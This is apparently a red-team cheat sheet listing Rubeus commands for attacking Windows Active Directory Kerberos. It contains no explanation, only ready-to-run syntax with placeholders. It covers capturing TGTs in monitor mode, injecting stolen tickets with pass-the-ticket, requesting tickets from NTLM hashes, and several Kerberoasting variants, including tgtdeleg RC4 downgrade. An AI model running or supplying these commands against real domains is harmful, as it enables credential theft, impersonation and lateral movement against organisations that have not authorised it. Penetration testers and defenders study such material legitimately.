.
.
##Catch TGT Tickets to our machine
==================================

.\Rubeus.exe monitor /interval:5


##Insert the stolen TGT Ticket into the Memory for our account (Ticket impersonation) 
===================================================================================== 

Rubeus.exe ptt /ticket:<<TGT-Ticket>>



##Ask and inject the ticket
============================

Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt


##Perform Kerberoasting with an existing TGT:
==============================================

Rubeus.exe kerberoast </spn:"blah/blah" | /spns:C:\temp\spns.txt> </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]


##Perform Kerberoasting with an existing TGT using an enterprise principal:
==============================================

Rubeus.exe kerberoast </spn:user@domain.com | /spns:user1@domain.com,user2@domain.com> /enterprise </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]


##Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail:
=================================================================================================================
 
Rubeus.exe kerberoast </ticket:BASE64 | /ticket:FILE.KIRBI> /autoenterprise [/ldaps] [/nowrap]


#Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:
=============================================================================================================

Rubeus.exe kerberoast /usetgtdeleg [/ldaps] [/nowrap]

.
.